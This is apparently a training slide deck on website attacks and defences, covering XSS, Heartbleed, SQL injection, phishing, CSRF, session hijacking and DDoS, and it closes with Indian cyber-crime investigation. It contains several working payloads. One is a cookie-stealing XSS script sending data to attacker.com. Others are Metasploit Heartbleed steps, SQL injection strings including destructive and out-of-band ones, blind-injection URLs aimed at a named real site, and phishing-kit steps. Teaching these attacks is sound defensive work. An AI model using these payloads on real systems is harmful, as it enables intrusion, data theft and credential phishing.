CURRENT

TECHNOLOGIES
 Types of Websites

Static Websites Dynamic Websites

• Quick to develop • Slower/Expensive to develop

• Easy to host • Hosting Costs a little more
• More secure • Less Secure
• Less easily hackable • Prone to hacking
• Requires web development • Much more functionalities
expertise to update site • Easy to update
• Site not as useful to the user • New content brings people back
• Content can get stagnant to the site and helps in the
search engines
• Can work as a system to allow
staff or users to collaborate
DYNAMIC
WEBSITE
S
WEBSITE BASE
 Website Technologies
• Markup Languages • Web Servers

HTML Internet Information Services

(IIS)
CSS

XML Apache

• Programming and Scripting Languages

• Databases
JavaScript
SQL Server
VBScript

Php MYSQL

C#

Perl

Asp.net
Ever come across a screen like
this??
 URL HIJACKING
They buy badly
Make money
from your spell domain
mistake
Fake website
or phishing
Redirect site
from the Infect with a drive
famous by download
URLs
Types of URL
hijacking Paid
Display Search
Hijacking Hijacking
CLICKJACKING
iframe

Position

Z-
index

Opacity
STROKEJACKING
It is extremely similar to clickjacking, in that a
malicious site has a user doing things they don’t
want to do. Except, this time, it’s with the keyboard
instead of the mouse – hence
the “stroke”. The attacking site gets the user to type
(or cut and paste), the information they’re looking for.
This could lead to another attack (if the user types
JavaScript), or just gathering a username and
password. The user thinks they are logging into a
site, but they’re really sending characters over to the
attacker’s site.

TAPJACKING
• A hacking technique where a malicious application
presents an unreal user interface in order to obtain user
events for a hidden action in the background.
• Like Clickjacking on the web, Tap Jacking occurs when a
malicious application displays a fake user interface that
seems like it can be interacted with, but actually passes
interaction events such as finger taps to a hidden user
interface behind it.
• Mostly the tap jacking technique is used for mobile
application and mobile websites
Tools and Techniques Required to Perform Attacks

 WHOIS
 Robots.txt files
 HTTrack-clone a website
 BeEF Tool
 Electronic Data Gathering, Analysis and Retrieval (EDGAR)
 Shodan Search
 Google Hacking
 DNS Lookup
 Nslookup
 DIG (Domain information Groper)
 Netcraft
 Httprint
 Fierce
 Encoder and Decoder
 OPEN
SOURCE
TOOLS
Commercial
TOOLS
XSS
Content
 Definition
 Types
 Process
 Live Attack
 Risks
 Counter Measures
 Definition
 Cross-site scripting (XSS) is a type of computer security
vulnerability typically found in web applications.
 XSS enables attackers to inject client-side scripts into web pages
viewed by other users.
 A cross-site scripting vulnerability may be used by attackers to
bypass access controls such as the same-origin policy.
 XSS Types
 Persistent (Stored)
Stored or Persistent XSS is a kind of XSS vulnerability where the
untrusted user input is processed and stored by the server in a file
or database without any validation and this untrusted data is fetched
from the storage and is reflected back in response without encoding
or escaping resulting in permanent code execution at the browser
whenever the stored data is reflected in the response.
- link in other website or email
 XSS Types
 Non Persistent (Reflected)
Reflected or Non-Persistent XSS is a kind of XSS vulnerability where
the untrusted user input is immediately processed by the server
without any validation and is reflected back in the response without
encoding or escaping resulting in code execution at the browser.
- forum, bulletin board, feedback form
 XSS Types
 Local (DOM based)
DOM Based XSS is a form of client side XSS which occurs in an
environment where the source of the data is in the DOM, the sink is
also in the DOM, and the data flow never leaves the browser. It
occurs when an untrusted data is given at the source is executed as
a result of modifying the DOM “environment” in the browser. DOM
XSS occurs when the untrusted data is not in escaped or encoded
form with respect to the context.
- PDF Adobe Reader, Flash Player
Process
 Screenshot
1)An attacker finds an xss hole in a web application
2) The attacker creates an attack URL for stealing sensitive
Information and disguises it so that it appears legitimate.

Here it is, <script> document.location =

”http://localhost/attacker.com/redirect.php?a=” + document.cookie</script>

3) The attacker distributes the malicious XSS link via social engineering to
unsuspected users.
 Screenshot

4) When the victim logs in, Javascript embedded with the

malicious XSS link executes and transmits the victim’s login
information to the attacker.
 XSS Risks
XSS can
1) Steal Cookies
- Hijack of user’s session - Unauthorized acess
2)Spy on what you do
3)Modify the content of web page by
- Inserting images or words - Misinforming - Spreading Bad
Reputation
4)Network Mapping
5)XSS viruses
XSS Countermeasures
1) Content Filtering:

“The application may attempt to detect and remove all scripts from un-
trusted HTML before sending it to the browser.” Content filtering is
otherwise known as sanitization. This defense technique uses filter
functions to remove potentially malicious data or instructions from user
input. Filter functions are applied after user input is read by a web
application, but before the input is employed in a operation or output to the
web browser. Removal of scripts from un-trusted content is a difficult
problem for web applications that permit HTML markup in user input such
as blog. To be completely effective in eliminating XSS, a filter function must
necessarily model the full range of parsing behaviors pertaining to script
execution for several browsers.
XSS Countermeasures
Challenges of Content Filtering:

Allowing all benign HTML user input, while simultaneously blocking

all potentially harmful scripts in the un-trusted output. Every control
character that can be used to introduce attack code also has a
legitimate use in some benign, non-script context. For example, the ' < '
character needs to be present in hyperlinks and text formatting, and the
' " ' character needs to be present in generic text content. Both are
legitimate and allowed user inputs, but can be abused to mount XSS
attacks. Browser behavior vary from browser to browser, they are
complex to model, not entirely understood and not all known (especially
for closed source browsers like Microsoft internet explorer). Therefore,
from a web application perspective, the task of implementing correct
and complete content filter functions is very difficult, if not impossible.
XSS Countermeasures
2) Browser Collaboration:
“The application may collaborate with the browser by indicating which
scripts in the web page are authorized, leaving the browser to
ensure the authorization policy is upheld.” Robust prevention of XSS
attacks can be achieved if web browsers are made capable of
distinguishing authorized from unauthorized scripts.

This approach can be implemented by

(a) creating a server–browser collaboration protocol to communicate
the set of authorized scripts, then
(b) modifying the browser to understand this protocol and enforce a
policy denying unauthorized script execution.
XSS Countermeasures
Challenges of Browser Collaboration:

Although this defense strategy is compelling and effective long term

solution, but its implementation will take long time because web
applications adopting this approach require their users to employ
modified browsers for protection from XSS attacks. To implement this
there must be agreement on some standards for server browser
collaboration, then these new standards must be incorporated in the
normal browser implementation. This is a long, complicated process
that can take several years.

Ex: Browser-Enforced Embedded Policies (BEEP)

HEARTBLEE
D
Heartbleed is a security bug in
the OpenSSL cryptography
library.
OpenSSL is a software library to be used in applications that need to secure
communications over computer networks against eavesdropping or need to
ascertain the identity of the party at the other end.

It has found wide use in internet web servers, serving a majority of all web sites.

OpenSSL contains an open-source implementation of the SSL and TLS

protocols.
The Secure Sockets Layer (SSL) and Transport
Layer Security (TLS) is the most widely deployed
security protocol used today. It is essentially a
protocol that provides a secure channel between
two machines operating over the Internet or an
internal network.
 What happened..??

 Vulnerability Heartbleed was announced to the world on

7th April 2014, as OpenSSL vulnerability and with a new
code release ( 1.0.1g)
 It was found by Google security Team and
Condenomicon
 Told that Private keys to SSL certificates could be
exposed
 Many Big name companies were vulnerable; Big tech
names, Banks, law enforcement, Intelligence Agencies
 But...
 What is heartbeat extension?

 Heartbeat is an echo functionality where either side

(client or server) requests that a number of bytes of data
that it sends to the other side be echoed back.
 The idea appears to be that this can be used as a keep-
alive feature, with the echo functionality presumably
meant to allow verifying that both ends continue to
correctly handle encryption and decryption
Background
The Heartbleed vulnerability is possibly the worst thing that ever happened
to online trust. Ironically, Heartbleed makes HTTPS less secure than plain
HTTP because attackers can obtain sensitive data without even having to
intercept traffic.

Initial reactions focused on :

• patching vulnerable web servers,
• revoking SSL certificates
• changing user passwords.

It took a couple more days to realize that Heartbleed also affects client
software, non-web SSL traffic and countless embedded devices which
will never receive a software update.
Lets see how to perform this attack with
Metasploit..!!
 It can be performed with powerful exploit
framework, Metasploit
 We'll see how it's performed step by step
 Step 1: Update Metasploit using msfupdate
 Step 2: Start metasploit
 Kali > msfconsole
Metasploit startup screen
 Step 3 : Find Heartbleed
 search heartbleed
 This would bring up two modules
 auxiliary/scanner/ssl/openssl_heartbleed
 and
 auxiliary.server/openssl_heartbeat_client_me
mory
 We'll use first one
Step 3 screenshot
Step 4
 Use Auxiliary module
 use auxiliary/scanner/ssl/openssl_heartbleed
 This will load the heartbleed module
info
 Type
msf > info
 This reveals the options that need to set in order to use this module
and a description of the module
Step 5
 Set options
 Although this module has numerous option, the critical one is
RHOSTS
 Let's set it to a target website on network that is still vulnerable to
heartbleed
 msf > set RHOSTS 192.168.1.169
Step 5
Step 6 : Run the module
 Finally, set the option 'verbos' to 'true'. This will provide us with
verbos output.
Msf > set verbos true
 And lets run it
msf > run
 As we can see in next screenshot , the server leaked about 64k
bytes of what was in it's memory
Success..!!
Let Us Define….

• Alice, Bob: Users of online services.

• Eve: A passive attacker (eavesdropper).

• Trudy: An active attacker who may exploit the

Heartbleed bug by sending specially crafted heartbeat
packets over an SSL (e.g.HTTPS) connection.

• yuri.com: A web site with vulnerable SSL software.

Since OpenSSL is so widely used, any web site should be
considered as a potential yuri.com until proven otherwise.
Attack patterns and
countermeasures
1 Extraction of sensitive data from vulnerable HTTPS
servers

In this scenario Alice enters or consults sensitive data on

yuri.com over HTTPS. Plain-text data linger in the memory
of the web server. Later, Trudy connects as a regular
HTTPS clients and exploits Heartbleed.

Countermeasures for end users

• Do not exchange sensitive information with a web site
until they tell you they have dealt with Heartbleed.

Field reports
• Canadian charged in 'Heartbleed' attack on tax agency.
2. Session hijacking from vulnerable HTTPS servers

In this scenario Trudy extracts session cookies rather than

login credentials. This allows her to take control of Alice's
account without waiting for her to enter her credentials.

Countermeasures for end users

• Log out of online services until they have dealt with
Heartbleed.
3. Extraction of SSL private keys from vulnerable
HTTPS servers

In this scenario Trudy extracts the SSL/TLS private key of

yuri.com. Regardless of what happens next, leakage of
private keys is always a major failure.

Lessons learned
• Protect private keys with a hardware security module.

Field reports
• Confirmed: Heartbleed Exposes Web Server's Private
SSL Keys
5. Tor traffic correlation

Eve, an evil dictator, wants to establish that Alice is using

Tor to communicate with george.com, a foreign human-
rights organization. Eve can spy on all Internet traffic
within her national boundaries but has no wiretapping
authority in other countries. She exploits Heartbleed
massively against vulnerable Tor exit nodes in order to
match outgoing traffic with her local intercepts.
4. Man-in-the-middle impersonation of online
services

In this scenario mallory.com impersonates yuri.com after

extracting its SSL private key. This so-called man-in-the-
middle attack (MITM) is more dangerous than passive
snooping because mallory.com can trick Alice into using a
compromised certificate. It also allows mallory.com to
defeat some multi-factor security measures.

Countermeasures for end users

• Check whether your browser detects revoked
certificates.
• If it does not, inspect certificates manually.

Lessons learned
• Heartbleed will probably be the end of the current
certificate revocation infrastructure.
6. De-anonymization of hidden servers and users by
malicious Tor nodes

Trudy sets up a number of malicious Tor guard node. She

exploits the Heartbleed vulnerability against clients that
connects to them, including Tor hidden servers and their
users. Although Tor hidden services are encrypted end-to-
end, Trudy can identify vulnerable users and servers
based on plaintext data leaked by Heartbleed at each end.
Besides, if she extracts the private key of a hidden
service, she can impersonate it.

Field reports
• "Tor hidden services might leak their long-term hidden
service identity keys to their guard relays."
7. Attacks against VPN servers

Alice is aware that most public WiFi networks provide no

privacy. Therefore she has configured her smartphone
and laptop to connect to the Internet through a VPN
service provider, yuri.com. (Alternatively, she could be
running her own VPN server at home, or using the VPN
feature that comes bundled with her DSL modem or her
NAS box.) Eve snoops on the WiFi network that Alice is
currently using, notices SSL-based VPN traffic from her
smartphone, exploits Heartbleed against the destination
IP address, and retrieves either VPN keys or plaintext
traffic.

Field reports
• Attackers Exploit the Heartbleed OpenSSL Vulnerability
to Circumvent Multi-factor Authentication on VPNs
• OpenVPN uses OpenSSL as its crypto library by default
and thus is affected
Some General
Countermeasures
 Do not use OpenSSL 1.0.1f.
 Disable heartbeat extension.
 Change login credentials if your site is compromised.
DANGER :
OpenSSL, an open source project staffed by only 10
individuals and run on a limited budget, is used to secure
millions of servers, ensuring the integrity of email, e-
commerce, online banking and other properties, in many
cases for multi-billion dollar companies.

Heartbleed obviously has wide-reaching implications, not

only for the integrity of the Web, but also for mobile apps –
but how much damage did it actually do prior to its
discovery and patching?
How damaging is Heartbleed?
The issue has also spread to mobile devices. Android
apps, for instance, may connect to servers that could be
affected by Heartbleed. While not dedicated browsing
tools such as Google Chrome or Apple Safari, some of
these apps have their own internal browsers, blurring the
line between mobile software and the Web. That risk is
worth noting, not just for the OpenSSL exploit but for
future considerations about overall Internet security.
Looking ahead …
These weaknesses are all addressable, and the
speed with which companies and security experts
have acted has been encouraging. Still, the
community will have to stay on its toes to protect the
emerging Internet of Everything from OpenSSL and
future bugs.
SQL Injection Attack
 What is SQL?

SQL (Structures Query Language) is a programming language to manage

database.
The managements systems that employ SQL are Microsoft SQL
Database, Oracle, MySQL, PostgreSQL, and others.
What is SQL Injection

SQL injection i.e. SQLI refers to the injection attack in which the attacker
executes malicious SQL queries that control a web application database
server

The attacker can use SQL injection to :

 Add, delete, edit or read content from the database
 Read source code from files on the database server
 Write files to the database server
Classification of SQL injections

There are 3 major classifications:

1. In-band SQLi (Classic SQLi)
2. Inferential SQLi (Blind SQLi)
3. Out-of-band SQLi
In-Band SQLi Or Classic Attacks

Most attacks rely on basic SQL manipulation and are considered

to be classic attacks. It includes
 WHERE clause modification
 UNION operator injection
 query stacking
WHERE Clause Manipulation: Any user input generally end up in
a WHERE Clause of the data base
Example:
In a login page where username is entered the SQL query looks like this:
 SELECT * FROM users WHERE name = '" + userName + "';
 if the "userName" variable is crafted in a specific way,the SQL
statement may do more than the code author intended.setting the
"userName" variable as:
' OR '1'='1
 or using comments to even block the rest of the query
' OR '1'='1' –
These user inputs renders the SQL Query like the following
 SELECT * FROM users WHERE name = '' OR '1'='1';
 SELECT * FROM users WHERE name = '' OR '1'='1' -- ';
SQL injection Using UNION: The UNION operator allows the
attacker to
extract sensitive information from the database.

 Example:

USER INPUT:
 ' AND 'a'='b' UNION SELECT 999, 'abc', 'xyz' FROM members
WHERE 'a'='a
GENERATED QUERY:
 SELECT id, name, description FROM products WHERE category = ''
AND 'a'='b' UNION SELECT 999, 'abc', 'xyz' FROM members
WHERE 'a'='a‘
The crafted query returns usernames and passwords of all
members in the database.
 Query stacking:Stacked queries provide a lot of control to the
attacker. By terminating the original query and adding a new one, it
will be possible to modify data and call stored procedures.
 Example
A classic attack using this technique could look like the following.

MALICIOUS USER INPUT:

 1; DELETE FROM products
GENERATED QUERY WITH MULTIPLE STATEMENTS:
 SELECT * FROM products WHERE productid=1;
DELETE FROM products
 Inference SQLi attack

The main intent of the attacker in an inference SQLi is identifying the

injectable parameters, extracting database schema.
Here no data is actually transferred via the web application and the
attacker would not be able to see the result of an attack in-band. It is
also referred as Blind injection attack
There are two well-known attack techniques that are based on
inference:
 Boolean-Based-Blind Injection
 Time-based-blind Attacks
Boolean-based-Blind Injection: Information is inferred from the behaviour
of the page by asking the server true/-false questions. If the injected statement
evaluates to true, the site continues to function normally. If the statement
evaluates to false, although there is no descriptive error message, the page
differs significantly from the normally-functioning page.

Example:
In this website it shows some information which is stored in some database
http://www.psn.com.pk/index.php?page=gallery.php&id=519
The attacker finds the vulnerability using Boolean based blind injection
False query:
http://www.psn.com.pk/index.php?page=gallery.php&id=519 and 1=2
True query:
http://www.psn.com.pk/index.php?page=gallery.php&id=519 and 1=1
Timed-based-blind attack: For Time-based attacks, the attacker
needs to instruct the database to perform a time-intensive operation. If
the web site does not return a response immediately, the web
application is vulnerable to Blind SQL Injection. A popular time intensive
operation is the sleep operation.
Example:
In the website
http://www.psn.com.pk/index.php?page=gallery.php&id=519
To perform time based blind attack the query will become:
http://www.psn.com.pk/index.php?page=gallery.php&id=519 and if(1=1,
sleep(10), false)
Out-of-band SQLi
 Out-of-band attack occurs when the attacker is unable to the same
channel to attack and gather result
 Out-of-band techniques, offer an attacker an alternative to inferential
time-based techniques, especially if the server responses are not very
stable.
Consider the following URL crafted by an attacker:
https://example.com/products.aspx?id=1;EXECmaster..xp_dirtree
'\\test.attacker.com\' –
This will produce the following SQL query.
 SELECT * FROM products WHERE id=1;EXEC master..xp_dirtree
'\\test.attacker.com\' --
 What happened is that there are now two separated queries that
SQL Server will execute.
/* First Query */
 SELECT * FROM products WHERE id=1
/* Second Query */
 EXEC master..xp_dirtree '\\test.attacker.com\' –
 The second query is invoking a stored procedure xp_dirtree. This
extended stored procedure can be used to get a list of all the folders
for the folder named in the xp.
screenshots
Recording of SQL attack
 SQL Injection (SQLi)

SQL INJECTION (SQLI) REFERS TO AN INJECTION ATTACK WHEREIN AN ATTACKER

CAN EXECUTE MALICIOUS SQL STATEMENTS (ALSO COMMONLY REFERRED TO AS A
MALICIOUS PAYLOAD) THAT CONTROL A WEB APPLICATION’S DATABASE SERVER
(ALSO COMMONLY REFERRED TO AS A RELATIONAL DATABASE MANAGEMENT
SYSTEM – RDBMS).
How SQL Injection works

 SELECT id FROM users WHERE username=’username’ AND

password=’password’ OR 1=1’
 # Define POST variables
 uname = request.POST['username']
 passwd = request.POST['password’]

 # SQL query vulnerable to SQLi

 sql = “SELECT id FROM users WHERE username=’” + uname + “’ AND
password=’” + passwd + “’”
 # Execute the SQL statement
 database.execute(sql)
What’s the worst an attacker can do with
SQL?

 bypass authentication or even impersonate specific users.

 allow the complete disclosure of data residing on a database server.
 data affects data integrity and could cause repudiation issues, for instance, issues
such as voiding transactions, altering balances and other records.
 to delete records from a database
 to allow arbitrary execution of operating system commands on the database server
What is a SQL Injection Vulnerability?

 Non-Technical Explanation
 Drive through <route> and <where should the bus stop?> if <when should the
bus stop?>.
 Drive through route 66 and stop on bus stops if there are people on the bus
stops.
 Drive through route 66 and do not stop on bus stops and ignore the rest of this
form. if there are people on the bus stop.
What is a SQL Injection
Vulnerability?

 Technical Explanation
 $statement = "SELECT * FROM users WHERE username = 'bob' AND password =
'mysecretpw’”
 $statement = "SELECT * FROM users WHERE username = '$user' AND password =
'$password'";
Different Types of the SQL Injection
Vulnerability
 Error based SQL Injection
 Boolean Based SQL Injection
 Time based SQL Injection

 Out-of-Band SQL Injection Vulnerability

Impacts of the SQL Injection
Vulnerability
 Add, delete, edit or read content from the database
 Read source code from files on the database server
 Write files to the database server
Preventing SQL Injection Vulnerabilities

 Server side scripting languages are not able to determine whether

or not the SQL query string is malformed; all they can do is send a
string to the database server and wait for the interpreted response

 when developing web applications you should use prepared

statements to prevent SQL injections. When using prepared
statements the structure and data are separated and can be
interpreted by the sql server without risking that an attacker is able
to change the structure of the SQL query for malicious purposes
What Can Be Done to Prevent SQL
Injection Attacks?

 sanitization
 validation
 Sanitization

 Sanitization usually involves running any submitted data through a

function (such as MySQL's mysql_real_escape_string() function) to
ensure that any dangerous characters (like " ' ") are not passed to a SQL
query in data.
 Validation
 attempts to ensure that the data submitted is in the form that is
expected. At the most basic level this includes ensuring that e-mail
addresses contain an "@" sign, that only digits are supplied when
integer data is expected, and that the length of a piece of data
submitted is not longer than the maximum expected length
Two ways:
 by blacklisting dangerous or unwanted characters (although
hackers can often get around blacklists)
 by whitelisting only those characters that are allowed in a given
circumstance, which can involve more work on the part of the
programmer
 Others way of prevention

 Trust no-one
 Don't use dynamic SQL when it can be avoid
 Firewall
 Update and patch
 Reduce your attack surface
 Use appropriate privileges
 Keep your secrets secret
 Don't divulge more information than you need it
Phishing
 What is Phishing ?

Phreaking + Fishing = Phishing

{Phreaking = making phone calls for free back in 70’s}

Phishing is the act of sending an email to a user falsely claiming to be an

established legitimate enterprise in an attempt to scam the user into
surrendering private information that will be used for identity theft.
Target By Sector
PhiShing
 Phishing Types
 Spear Phishing

 Clone Phishing

 Whaling
___________________________________________________________

Spear Phishing

Phishing attempts directed at specific individuals or companies have been

termed spear phishing. Attackers may gather personal information about their
target to increase their probability of success. This technique is by far the
most successful on the internet today, accounting for 91% of attacks.
Clone Phishing
A type of phishing attack where a legitimate, email containing an attachment or link has
had its content and recipient address taken and used to create an almost identical or
cloned email. The attachment or Link within the email is replaced with a malicious
version and then sent from an email address spoofed to appear to come from the
original sender. It may claim to be a re-send of the original or an updated version to
the original.

Whaling
Several recent phishing attacks have been directed specifically at senior executives and
other high profile targets within businesses, and the term whaling has been coined for
these kinds of attacks.
 HERE’S HOW IT’S DONE
Step: 1
Setting Up A Web
Page Which
Looks Similar To
The Original
Place your screenshot here One.

Link :
http://a0145877.xs
ph.ru/
 Step: 2
A php script which
stores credentials
to a file is what
Place your screenshot here
required to
harvest
credentials
 Step: 3
In the html page
search for submit
Place your screenshot here
form and change
it to written php
script
STEP: 4 Host it in a server & Share The Link
118
119
 PHISHING
DON’T GET
HOOKED
 DEFINITION
It is the attempt to obtain sensitive information
such as usernames, passwords, and credit card
details, often for malicious reasons, by disguising
as a trustworthy entity in an electronic
communication.

TYPES OF PHISHING
• Spear phishing • Filter evasion
• Clone phishing • Link manipulation
• Whaling • Tabnabbing
 How to protect yourself
1. Be wary of emails asking for confidential information

2. Make sure you familiarise yourself with a website's privacy

policy

3. Watch out for generic-looking requests for information.

4. Never submit confidential information via forms embedded

within email messages.

5. Never use links in an email to connect to a website unless you

are absolutely sure they are authentic. Instead, open a new
browser window and type the URL directly into the address bar

6. Make sure you maintain effective software to combat phishing

PHISHING COUNTERMEASURES IN
DETAIL
Auto-Generate Domain-Specific
Password
Hashing of passwords with a secret key along with
website domain name.
Auto-Generate Domain-Specific
Password
Due to this mechanism, it becomes really
hard for the attacker to get the password.
Auto-Generate Domain-Specific
Password

Disadvantage
• Practical implementation is quite difficult.

• Many banks use multiple domains and sub-

domains

• It’s a static solution

 Web Browser’s PWD Database
Random passwords are generated and stored in the browsers.
It is more “secure,” as the browser will only give the credentials to the
right URL. If anything changes in the URL, it won’t pass credentials

Disadvantage-
•It doesn’t work fully with sub-domains.
•Even here, passwords are stored in plain text.
Phishing Scam Alert Add-
ons/Extensions
The concept is like this. If server visits any known
fake/phishing URL, then that tool bar turns red.
 Phishing Scam Alert Add-
ons/Extensions
If that phishing or fake site is the one suspect site, then it turns
yellow.
 2FA—Two-Factor Authentication
It requires not only a username and password, but also some piece
of information that only the user knows (physical token).
Encrypted Key Exchange Process—Prevent
Dictionary Attacks

Series of protocols are implemented for encrypted key

exchange.
This key is generated by combining the shared password.
This process takes place in such a way that the phisher
can’t guess it.
These protocols were awkward to implement and use and
they were also too time-consuming.
 Educating Your People

Conducting seminars and workshops on ethical hacking and

Internet security in order to educate their employees.
This can be a quality step towards security awareness.
Logical awareness has to be raised.
CSRF
 Content

 Definition

 Attack Process

 Screenshots

 CounterMeasures

 Tools

 References
 Definition

 Cross-Site Request Forgery (CSRF) is an attack that forces an

end user to execute unwanted actions on a web application in
which they're currently authenticated.

 CSRF attacks specifically target state-changing requests, not

theft of data, since the attacker has no way to see the response
to the forged request.
 Definition Cont...

 With a little help of social engineering (such as sending a link via email
or chat), an attacker may trick the users of a web application into
executing actions of the attacker's choosing.

 If the victim is a normal user, a successful CSRF attack can force the
user to perform state changing requests like transferring funds,
changing their email address, and so forth.

 If the victim is an administrative account, CSRF can compromise the

entire web application.
Process 140

Malicious Target
Browser
Website Website

Send login request

Return login response with
cookies
Visit malicious website

Return malicious code

Send forged request with

cookies

 Root cause of CSRF

 Existing browsers do not check whether a client actually initiates an
HTTP request
 Screenshot

Step 1 − Let us perform a CSRF forgery by embedding a Java script into

an image. The snapshot of the problem is listed below.
Screenshot

Step 2 − Now we need to mock up the transfer into a 1x1 image and
make the victim to click on the same.
Screenshot

Step 3 − Upon submitting the message, the message is displayed as

highlighted below.
 Screenshot
Step 4 − Now if the victim clicks the following URL, the transfer is
executed, which can be found intercepting the user action using burp
suite. We are able to see the transfer by spotting it in Get message as
shown below –

Step 5 − Now upon clicking refresh, the lesson completion mark is

shown.
 Tool – OWASP CSRF Tester

Test your applications for CSRF

-Record and replay transactions
-Tune the recorded test case
-Run test case with exported HTML document

Test case alternatives

-Auto-Posting Forms
-Evil iFrame
-IMG Tag
-XMLHTTPRequest
-Link
 Counter Measures

 Web application should insert random values, tied to the

specified user’s session, into the forms it generates
 Web application should re-authenticate every time when users
are about to perform a particularly dangerous operation
Counter Measures Cont..

Safe Methods
1) The GET and HEAD methods SHOULD NOT have the significance of
taking an action other than retrieval. These methods ought to be
considered "safe" ...
$_POST superglobal and not $_GET or $_REQUEST
2)Try to force the use of your own forms
- On form generation, store unique token in user $_SESSION and
form hidden field
- On submit, check token
-- Limits attack to only single user
-- Attacker would need to obtain users valid form AND session token
- Put expiry on form tokens
Session HIJECKING
What is session hijacking ?
Session hijacking is the process of exploiting valid computer session
which involves stealing the victim's cookie.
What is a cookie ?

• A cookie known as a web cookie or http cookie is a small piece of text

stored by the user browser.
• A cookie is sent as an header by the web server to the web browser on the
client side.
• A cookie is static and is sent back by the browser unchanged every time it
accesses the server.
Types of session hijacking

1 ) Active :-
In active attack, an attackers finds an active session and takes over.

2 ) Passive : -
With passive attack, an attacker hijacks a session, but sits back, and
watches and record all the traffic that is being send forth
Session hijacking working…
Showing video example of session hijacking
 Levels of Session
Session Hijacking
Hijacking

Session Hijacking Steps Session Hijacking Tools

Types Of Session Hijacking Countermeasures

 Steps in Session Hijacking
Place yourself between the victim and the target
(you must be able to sniff the network)

Monitor the flow of packets

Predict the sequence number

Kill the connection to the victim’s machine

Take over the session

Start injecting packets to the target server

 Types of Session Hijacking
There are two types of session hijacking attacks:

Active

• In an active attack, an attacker finds an

active session and takes over

Passive

• With passive attack, an attacker hijacks a

session, but sits back, and watches and
records all the traffic that is being sent
forth
 Session Hijacking Levels

Session hijacking takes place at two levels:

• Network Level Hijacking

• Application level Hijacking

Network level can be defined as the interception of the packets during the
transmission between client and the server in a TCP and UDP session

Application level is about gaining control on HTTP user session by obtaining the
session ID’s
Some common tools used for Session
Hijacking
The following are a few that
belong to this category:

• Juggernaut
• Hunt
• TTY Watcher
• IP Watcher
• T-Sight
• Paros HTTP Hijacker
Counter Measures for Session
Hijacking
Use Encryption

Use Secure protocol(SSL and

HTTPS) Set a time out for the expiry of
the session when inactive
Limit incoming connections
where possible Expiry of session if the agent if
browsing changes
Minimize remote access

Logout Functionality
Counter Measures for Session
Hijacking (Cont….)
ID creation after authoritative
login

Long session ID’s

Expiry of session if the operating
Forcing re-authentication or set- system changes
up authentication
Expiry of the session if the
device changes(Web Socket)
Captcha prevention

Educate the employees

Distributed Denial
of Service
What is Distributed Denial of Service?

 A denial-of-service attack (DoS attack) is a cyber-attack where the

perpetrator seeks to make a machine or network resource unavailable to
its intended users by temporarily or indefinitely disrupting services of
a host connected to the Internet. Denial of service is typically
accomplished by flooding the targeted machine or resource with
superfluous requests in an attempt to overload systems and prevent some
or all legitimate requests from being fulfilled.
Types of DDos
Volume Based Attacks

 Includes UDP floods, ICMP floods, and other spoofed-packet floods. The
attack’s goal is to saturate the bandwidth of the attacked site, and
magnitude is measured in bits per second (Bps).
Protocol Attacks

 Includes SYN floods, fragmented packet attacks, Ping of Death, Smurf

DDoS and more. This type of attack consumes actual server resources, or
those of intermediate communication equipment, such as firewalls and
load balancers, and is measured in Packets per second.
Application Layer Attacks

 Includes low-and-slow attacks, GET/POST floods, attacks that target

Apache, Windows or OpenBSD vulnerabilities and more. Comprised of
seemingly legitimate and innocent requests, the goal of these attacks is to
crash the web server, and the magnitude is measured in Requests per
second.
LIVE DEMO
Prevention and Mitigation Strategy

 The first things to do in DDoS mitigation is to identify normal conditions for

network traffic by defining “traffic patterns”, which is necessary for threat
detection and alerting. DDoS mitigation also requires identifying incoming
traffic to separate human traffic from human-like bots and hijacked web
browsers. The process is done by comparing signatures and examining
different attributes of the traffic, including IP addresses, cookie variations,
HTTP headers, and Javascript footprints.

 One technique is to pass network traffic addressed to a potential target

network through high-capacity networks with "traffic scrubbing" filters.
Law and Investigations
 INVESTIGATION
Challenges in the investigation of Cyber Crime (Website Crime)
Investigation of Cyber-crimes are different from conventional
investigation as:
 Incident taking place in Virtual World
 Borderless/Transnational
 Issues of jurisdiction
 Issue of connecting the accused with the
machine/computer
 Lack of enthusiasm in reporting Cyber crime
The essential Requirements for Investigation are:
 Immediate Reporting of Breaches.
 Adequate Tools.
 Trained Investigators.
 Computer Literate Witness.
 Assistance of Forensic Experts.
 Immediate investigation.

Common Procedure of Web Site Crime investigation

 Who is., Domain Detail,If domain is active then it must

have working email address and payment detail,
contact registrar, Registrar can give Domain IP address
and cell number and payment instrument.
17
4
 Email ID used for Sell hosting server is important because
police can get email id, creation IP, alternate email ID, Cell
number, IP logs.
 An Law Enforcement Agency of the India can demands the
information like IP Logs, Login credentials of the accused for
investigation through Section 91 of CRPC 1973, for detailed
information of Section 91 of CRPC 1973 kindly refer
annexure.
 The Law Enforcement agencies can perform detailed
investigation of the Cyber Crime cases through the Internet
Protocol Data Record (IPDR) of the used network. The IPDR
can be obtained from the ISP of the concerned network. The
Sample of the IPDR is shown in figure. 17
5
FIGURE : Sample Of Notice under 91 Crpc 1973.
Figure : Sample of IPDR
Crimes and Laws Relating to Website.
 Harassment via fake public profile on social networking
site.
 Online Hate Community.
 Email Account Hacking.
 Web Defacement.
 Introducing Viruses, Worms, Backdoors, Rootkits, Trojans,
Bugs.
 Cyber Terrorism.
 Phishing and Email Scams.
 Theft of Confidential Information.
WEBSITE HACKING CASE STUDY
 Hacking and defacement of Assam police website.

 Hacker hacks into a financial website.

 Indian Army website hacked.

 ISRO Website Hack.

 Bazee.com

 E-Bay Account Takeover

 Incometaxpune.Com Redirection To Pornographic Content